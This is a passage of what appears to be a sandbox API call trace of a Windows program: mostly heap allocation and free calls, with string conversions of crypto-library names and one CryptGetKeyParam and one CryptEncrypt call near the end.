hHeap=0x1780000) returned 1 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0125.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0125.337] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0125.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0125.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0125.338] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0125.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0125.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0125.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0125.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0125.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0125.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0125.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0125.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0125.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0125.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0125.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0125.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0125.339] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0125.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0125.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0125.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0125.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0125.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0125.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0125.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0125.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0125.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0125.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0125.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0125.339] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0125.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0125.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0125.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0125.340] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0125.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0125.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0125.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0125.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0125.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0125.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0125.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0125.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0125.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0125.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0125.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0125.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0125.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0125.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0125.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0125.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0125.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0125.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0125.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0125.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0125.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0125.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0125.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0125.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0125.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0125.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0125.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0125.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0125.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0125.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0125.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0125.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0125.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0125.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0125.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0125.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0125.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0125.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0125.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0125.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0125.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0125.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0125.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0125.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0125.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0125.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0125.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0125.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0125.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0125.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0125.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0125.343] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0125.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0125.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0125.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0125.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0125.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0125.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0125.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0125.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0125.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0125.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0125.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0125.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0125.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0125.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796fc8 [0125.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0125.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0125.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0125.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0125.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0125.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0125.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0125.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0125.345] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e2790, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2790*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0125.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0125.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0125.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0125.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0125.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0125.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0125.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0125.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0125.348] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.348] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.348] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0125.348] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.348] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0125.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0125.348] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x86e3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x86f0) returned 1 [0125.348] CharLowerBuffW (in: lpsz="byte[34545]", cchLength=0xb | out: lpsz="byte[34545]") returned 0xb [0125.348] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.348] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 